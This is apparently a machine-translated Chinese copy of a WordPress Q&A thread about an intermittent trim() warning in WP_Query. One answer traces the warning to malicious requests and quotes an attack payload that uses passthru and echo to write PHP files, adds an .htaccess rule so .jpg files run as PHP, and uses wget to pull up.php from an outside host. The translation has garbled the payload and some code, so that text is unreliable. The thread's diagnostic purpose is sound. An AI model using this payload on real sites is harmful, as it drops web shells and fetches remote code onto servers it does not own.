WordPress 4.9.5 PHP间歇性警告Trim()要求参数1为字符串,给出数组

时间:2018-05-24 作者:crmpicco

我正在运行Wordpress 4.9.5,偶尔会在日志中看到以下错误。

E_WARNING: trim() expects parameter 1 to be string, array given
堆栈跟踪如下所示,因此它不是来自自定义主题代码。

in trim called at /var/www/wordpress/html/wp-includes/class-wp-query.php (736)
…::parse_query called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (1621)
…ry::get_posts called at /var/www/wordpress/html/wp-includes/
class-wp-query.php (3230)
in WP_Query::query called at /var/www/wordpress/html/wp-includes/class-wp.php (599)
in WP::query_posts called at /var/www/wordpress/html/wp-includes/class-wp.php (715)
in WP::main called at /var/www/wordpress/html/wp-includes/functions.php (960)
in wp called at /var/www/wordpress/html/wp-blog-header.php (16)
in require called at /var/www/wordpress/html/index.php (17)
这是一个已知/未知的Wordpress错误,是否有修复程序?

1 个回复
SO网友:conner_bw

我今天碰到了这个。这是一只虫子。我在这里提交了一份bug报告:

https://core.trac.wordpress.org/ticket/46797

问题是这行代码:

$qv[\'name\'] = trim( $qv[\'name\'] );
资料来源:https://github.com/WordPress/wordpress-develop/blob/a0ca5afd8977b5a3857084d9cb1bd345166e2f21/src/wp-includes/class-wp-query.php#L764

(恶意)用户发送如下请求:

获取/?q=用户/密码(&P);名称[#post\\u render][]=传递(&P);名称[#类型]=标记(&T);名称[#标记]=echo“Vuln!!立即修补!\'>沃恩。htm;回音“Vuln!!”>站点/默认/文件/漏洞。php;回音“Vuln!!”>沃恩。php;cd站点/默认/文件/;echo“AddType应用程序/x-httpd-php”。jpg“>。htaccess;wget\'http://40k.waszmann.de/Deutsch/images/up.php\'

这样的请求使$qv[\'name\']成为一个数组,而不是一个字符串。

需要消毒。

结束
标签: wp-query   functions   warnings   小码农  

相关推荐

Using $_GET in Functions.php

我在函数中不断遇到此代码的未定义索引错误。我做错了什么?function hire_more(){ $hire = $_GET[\'hire_more\']; write_log($hire); } add_action(\'wp_loaded\',\'hire_more\');